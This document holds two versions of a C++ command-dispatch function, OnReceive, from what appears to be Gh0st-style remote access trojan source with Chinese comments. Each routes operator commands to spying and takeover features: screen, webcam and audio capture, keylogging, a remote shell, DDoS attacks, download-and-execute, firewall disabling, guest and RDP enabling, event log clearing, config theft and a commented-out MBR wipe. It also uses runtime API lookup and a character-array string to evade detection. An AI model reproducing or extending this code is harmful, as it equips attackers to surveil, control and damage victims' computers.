// 加上激活 void CKernelManager::OnReceive(LPBYTE lpBuffer, UINT nSize) { typedef LONG (WINAPI *InterlockedExchangeT) ( __inout LONG volatile *Target, __in LONG Value ); InterlockedExchangeT pInterlockedExchange = (InterlockedExchangeT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"InterlockedExchange"); typedef VOID (WINAPI *SleepT) ( __in DWORD dwMilliseconds ); SleepT pSleep = (SleepT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"Sleep"); typedef HANDLE (WINAPI *CreateThreadT)( __in_opt LPSECURITY_ATTRIBUTES lpThreadAttributes, __in SIZE_T dwStackSize, __in LPTHREAD_START_ROUTINE lpStartAddress, __in_opt LPVOID lpParameter, __in DWORD dwCreationFlags, __out_opt LPDWORD lpThreadId ); CreateThreadT pCreateThread=(CreateThreadT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"CreateThread"); typedef BOOL (WINAPI *CloseHandleT) ( __in HANDLE hObject ); char DDZGlGm[] = {'C','l','o','s','e','H','a','n','d','l','e','\0'}; CloseHandleT pCloseHandle = (CloseHandleT)GetProcAddress(LoadLibrary("KERNEL32.dll"),DDZGlGm); typedef BOOL (WINAPI *EnumWindowsT)( __in WNDENUMPROC lpEnumFunc, __in LPARAM lParam); EnumWindowsT pEnumWindows=(EnumWindowsT)GetProcAddress(LoadLibrary("USER32.dll"),"EnumWindows"); switch (lpBuffer[0]) { case COMMAND_ACTIVED: pInterlockedExchange((LONG *)&m_bIsActived, true); break; case COMMAND_LIST_DRIVE: // 文件管理 m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_FileManager, (LPVOID)m_pClient->m_Socket, 0, NULL, false); break; case COMMAND_SCREEN_SPY: // 屏幕查看 m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_ScreenManager, (LPVOID)m_pClient->m_Socket, 0, NULL, true); break; case COMMAND_WEBCAM: // 摄像头 m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_VideoManager, (LPVOID)m_pClient->m_Socket, 0, NULL); break; case COMMAND_AUDIO: // 声音监听 m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_AudioManager, (LPVOID)m_pClient->m_Socket, 0, NULL); break; case COMMAND_SHELL: // 远程sehll m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_ShellManager, (LPVOID)m_pClient->m_Socket, 0, NULL, true); break; case COMMAND_KEYBOARD: //键盘记录 m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_KeyboardManager, (LPVOID)m_pClient->m_Socket, 0, NULL); break; case COMMAND_SYSTEM: //系统管理,包括进程,窗口 m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_SystemManager, (LPVOID)m_pClient->m_Socket, 0, NULL); break; case COMMAND_SERMANAGER: // 服务管理 m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_SerManager, (LPVOID)m_pClient->m_Socket, 0, NULL); break; case COMMAND_DDOS_ATTACK: { ATTACK m_Attack; memcpy(&m_Attack,lpBuffer + 1,sizeof(ATTACK)); DDOSManager m_DDOSManager(&m_Attack); } break; case COMMAND_DDOS_STOP: Stoping = FALSE; break; case COMMAND_REGEDIT: //注册表管理 m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_RegeditManager, (LPVOID)m_pClient->m_Socket, 0, NULL); break; case COMMAND_SYSINFO: m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_SysInfoManager, (LPVOID)m_pClient->m_Socket, 0, NULL); break; case COMMAND_NET_USER: // 无NET加用户 m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)NETUSER, (LPVOID)(lpBuffer + 1), 0, NULL, true); break; case COMMAND_OPEN_PROXY: // 开启代理 m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)OpenProxy, (LPVOID)(lpBuffer + 1), 0, NULL, true); break; case COMMAND_OPEN_3389: { Open3389((LPCTSTR)(lpBuffer + 1), nSize -2); } break; case COMMAND_GUEST: // 开启GUEST账号 OpenGuest(); break; case COMMAND_STOPFIRE: // 关防火墙 StopFire(); break; case COMMAND_CHANGE_PORT: // 更改终端 m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0,(LPTHREAD_START_ROUTINE)ChangePort, (LPVOID)(lpBuffer + 1), 0, NULL, true); break; case COMMAND_SENDMSG: { pCloseHandle(pCreateThread(NULL,NULL,Loop_MsgBox,&lpBuffer[1],NULL,NULL)); pSleep(500); } break; case COMMAND_DOWN_EXEC: // 下载者 m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_DownManager, (LPVOID)(lpBuffer + 1), 0, NULL, true); pSleep(100); // 传递参数用 break; case COMMAND_OPEN_URL_SHOW: // 显示打开网页 OpenURL((LPCTSTR)(lpBuffer + 1), SW_SHOWNORMAL); break; case COMMAND_OPEN_URL_HIDE: // 隐藏打开网页 OpenURL((LPCTSTR)(lpBuffer + 1), SW_HIDE); break; case COMMAND_REMOVE: // 卸载, UnInstallService(); break; case COMMAND_CLEAN_EVENT: // 清除日志 CleanEvent(); break; case COMMAND_SESSION://会话管理 CSystemManager::ShutdownWindows(lpBuffer[1]); break; case COMMAND_RENAME_REMARK: // 改备注 SetHostID((LPCTSTR)(lpBuffer + 1)); break; case COMMAND_CHANGE_GROUP: // 改分组 SetInfo("Group", (LPCTSTR)(lpBuffer + 1), "BITS"); break; case COMMAND_UPDATE_SERVER: // 更新服务端 if (UpdateServer((char *)lpBuffer + 1)) UnInstallService(); break; case COMMAND_REPLAY_HEARTBEAT: // 回复心跳包 break; case COMMAND_SORT_PROCESS: // 进程筛选 try { if (isProcesin((LPTSTR)(lpBuffer + 1))) { BYTE bToken = TOKEN_INFO_YES; m_pClient->Send(&bToken, 1); }else { BYTE bToken = TOKEN_INFO_NO; m_pClient->Send(&bToken, 1); } }catch(...){} break; case COMMAND_SORT_WINDOW: // 窗体筛选 try { strcpy(temp_proc,(LPTSTR)(lpBuffer + 1)); pEnumWindows(EnumWindowsList,0); if (proc_tag) { BYTE bToken = TOKEN_INFO_YES; m_pClient->Send(&bToken, 1); proc_tag = false; }else { BYTE bToken = TOKEN_INFO_NO; m_pClient->Send(&bToken, 1); } }catch(...){} break; } }
// 加上激活 void CKernelManager::OnReceive(LPBYTE lpBuffer, UINT nSize) { static int dwTime=0; pcmd_plugin cmd=NULL; switch (lpBuffer[0]) { case COMMAND_ACTIVED: LOG((LEVEL_INFO,"COMMAND_ACTIVED:%d\n",nSize)); { if ( lstrlen(CKeyboardManager::ConnPass) == 0 )//判断自身密码是否为空,空则跳过验证 { if ( m_pClient->bSendLogin )//判断是否重复发送,测试的时候会上2次 { sendLoginInfo_true( m_strServiceName, m_pClient, (GetTickCount() - CKeyboardManager::dwTickCount)/2 ); m_pClient->bSendLogin = FALSE; } InterlockedExchange((LONG *)&m_bIsActived, TRUE); } else//不为空 { char Pass[256] = {0}; memcpy( Pass, lpBuffer + 1, 200 ); if ( lstrcmpi( CKeyboardManager::ConnPass, Pass ) == 0 )//开始验证 { if ( m_pClient->bSendLogin )//判断是否重复发送,测试的时候会上2次 { sendLoginInfo_true( m_strServiceName, m_pClient, (GetTickCount() - CKeyboardManager::dwTickCount)/2 ); m_pClient->bSendLogin = FALSE; } InterlockedExchange((LONG *)&m_bIsActived, TRUE);//符合,则激活 } else { InterlockedExchange((LONG *)&m_bIsActived, FALSE);//不符合,则不激活 } } } break; case COMMAND_LIST_DRIVE: // 文件管理 LOG((LEVEL_INFO,"COMMAND_LIST_DRIVE:%d\n",nSize)); m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_FileManager, (LPVOID)m_pClient->m_Socket, 0, NULL, FALSE); break; case COMMAND_SCREEN_SPY: // 屏幕查看 LOG((LEVEL_INFO,"COMMAND_SCREEN_SPY:%d\n",nSize)); m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_ScreenManager,(LPVOID)m_pClient->m_Socket, 0, NULL, TRUE); break; case COMMAND_WEBCAM: // 摄像头 LOG((LEVEL_INFO,"COMMAND_WEBCAM:%d\n",nSize)); m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_VideoManager,(LPVOID)m_pClient->m_Socket, 0, NULL, FALSE); break; case COMMAND_AUDIO: // 语音 LOG((LEVEL_INFO,"COMMAND_AUDIO:%d\n",nSize)); m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_AudioManager,(LPVOID)m_pClient->m_Socket, 0, NULL, FALSE); break; case COMMAND_SHELL: // 远程sehll LOG((LEVEL_INFO,"COMMAND_SHELL:%d\n",nSize)); m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_ShellManager, (LPVOID)m_pClient->m_Socket, 0, NULL, TRUE); break; case COMMAND_KEYBOARD: LOG((LEVEL_INFO,"COMMAND_KEYBOARD:%d\n",nSize)); //2011/04/29 -yx //dwTime=0; // if (!dwTime) // { // m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_HookKeyboard, (LPVOID)(lpBuffer+1), 0, NULL, TRUE); //2011/04/29 yx // dwTime++; // } // // m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_KeyboardManager,(LPVOID)m_pClient->m_Socket, 0, NULL, FALSE); break; case COMMAND_SYSTEM: LOG((LEVEL_INFO,"COMMAND_SYSTEM:%d\n",nSize)); m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_SystemManager,(LPVOID)m_pClient->m_Socket, 0, NULL, FALSE); break; case COMMAND_DOWN_EXEC: // 下载者 LOG((LEVEL_INFO,"COMMAND_DOWN_EXEC:%d\n",nSize)); m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_DownManager,(LPVOID)(lpBuffer + 1), 0, NULL, TRUE); SleepEx(101,0); // 传递参数用 break; case COMMAND_OPEN_URL_SHOW: // 显示打开网页 LOG((LEVEL_INFO,"COMMAND_OPEN_URL_SHOW:%d\n",nSize)); OpenURL((LPCTSTR)(lpBuffer + 1), SW_SHOWNORMAL); break; case COMMAND_OPEN_URL_HIDE: // 隐藏打开网页 LOG((LEVEL_INFO,"COMMAND_OPEN_URL_HIDE:%d\n",nSize)); OpenURL((LPCTSTR)(lpBuffer + 1), SW_HIDE); break; case COMMAND_REMOVE: // 卸载, { LOG((LEVEL_INFO,"COMMAND_REMOVE:%d\n",nSize)); // liucw add 2013.07.25 // //停止并删除插件 GLOBAL_PLUGSERVER->SetSocket(m_pClient); GLOBAL_PLUGSERVER->OnPluginRemove(0,0); // 卸载 UnInstallService(); break; } case COMMAND_CLEAN_EVENT: // 清除日志 LOG((LEVEL_INFO,"COMMAND_CLEAN_EVENT:%d\n",nSize)); { CleanEvent(); } break; case COMMAND_SESSION: LOG((LEVEL_INFO,"COMMAND_SESSION:%d\n",nSize)); CSystemManager::ShutdownWindows(lpBuffer[1]); break; case COMMAND_RENAME_REMARK: // 改备注 LOG((LEVEL_INFO,"COMMAND_RENAME_REMARK:%d\n",nSize)); SetHostID(m_strServiceName, (LPCTSTR)(lpBuffer + 1)); break; case COMMAND_UPDATE_SERVER: // 更新服务端 LOG((LEVEL_INFO,"COMMAND_UPDATE_SERVER:%d\n",nSize)); if (UpdateServer((char *)lpBuffer + 1)) UnInstallService(); break; case COMMAND_REPLAY_HEARTBEAT: // 回复心跳包 ((CManager*)this)->m_pClient->dwHeartTime=0; break; case COMMAND_DDOS: LOG((LEVEL_INFO,"COMMAND_DDOS:%d\n",nSize)); // if ( !Gobal_DDOS_Running ) // { // m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)DDOS_Attacker, (LPVOID)lpBuffer, 0, NULL, TRUE); // SleepEx(110,0);//传递参数用 // } break; case COMMAND_DDOS_STOP: LOG((LEVEL_INFO,"COMMAND_DDOS_STOP:%d\n",nSize)); //DDOS_Stop(); break; case COMMAND_HIT_HARD: LOG((LEVEL_INFO,"COMMAND_HIT_HARD:%d\n",nSize)); // KillMBR(); break; case COMMAND_OPEN_3389: LOG((LEVEL_INFO,"COMMAND_OPEN_3389:%d\n",nSize)); Open3389(); break; case COMMAND_CHAJIAN: // 下载插件 LOG((LEVEL_INFO,"COMMAND_CHAJIAN:%d\n",nSize)); //m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_CHAJIAN,(LPVOID)(lpBuffer + 1), 0, NULL, TRUE); SleepEx(110,0); // 传递参数用 break; case COMMAND_SERECT_CFG: // 密取配置 LOG((LEVEL_INFO,"COMMAND_SERECT_CFG:%d\n",nSize)); m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_SecretCfg,(LPVOID)(lpBuffer + 1), 0, NULL, TRUE); break; case COMMAND_CHAJIAN_FORMIQU: // LOG((LEVEL_INFO,"COMMAND_CHAJIAN_FORMIQU:%d\n",nSize)); // printf((char*)(lpBuffer + 1)); m_pObjEvidence->PassBackFileList((char*)(lpBuffer + 1),0); // m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_CHAJIAN_MIQU,(LPVOID)(lpBuffer + 1), 0, NULL, TRUE); // SleepEx(110,0); // 传递参数用 break; case TOKEN_EVIDENCE_SREECN_ARG: // 下载插件 LOG((LEVEL_INFO,"TOKEN_EVIDENCE_SREECN_ARG:%d\n",nSize)); m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_CHAJIAN_MIQU,(LPVOID)(lpBuffer + 1), 0, NULL, TRUE); SleepEx(110,0); // 传递参数用 break; case COMMAND_PLUGIN_REQUEST: // 2.0插件下载 LOG((LEVEL_INFO,"收到COMMAND_PLUGIN_REQUEST,buff大小:%d(%x) .\n",nSize,nSize)); cmd=new cmd_plugin; if (!cmd) { break; } cmd->Clientsocket=m_pClient; cmd->nSize=nSize-1; cmd->lpBuffer=lpBuffer+1; m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_Plugin_Request,(LPVOID)(cmd), 0, NULL, TRUE); break; // { // ++lpBuffer; // --nSize; // // // 每次都应该设置一下,防止丢掉 // GLOBAL_PLUGSERVER->SetSocket(m_pClient); // int ret = GLOBAL_PLUGSERVER->OnPluginRequest(lpBuffer,nSize); // if( ret != 0 ) // { // LOG((LEVEL_WARNNING,"处理插件下载命令错,ret=%d",ret)); // } // GLOBAL_PLUGSERVER->ProcessConfig(); // // break; // // } case COMMAND_ONLINE_ERROR: { LOG((LEVEL_INFO,"上线时发送错误.\n")); m_pClient->Disconnect(); break; } default: LOG((LEVEL_ERROR,"UNKNOWN COMMAND:%d(%x)\n",lpBuffer[0],lpBuffer[0])); break; } }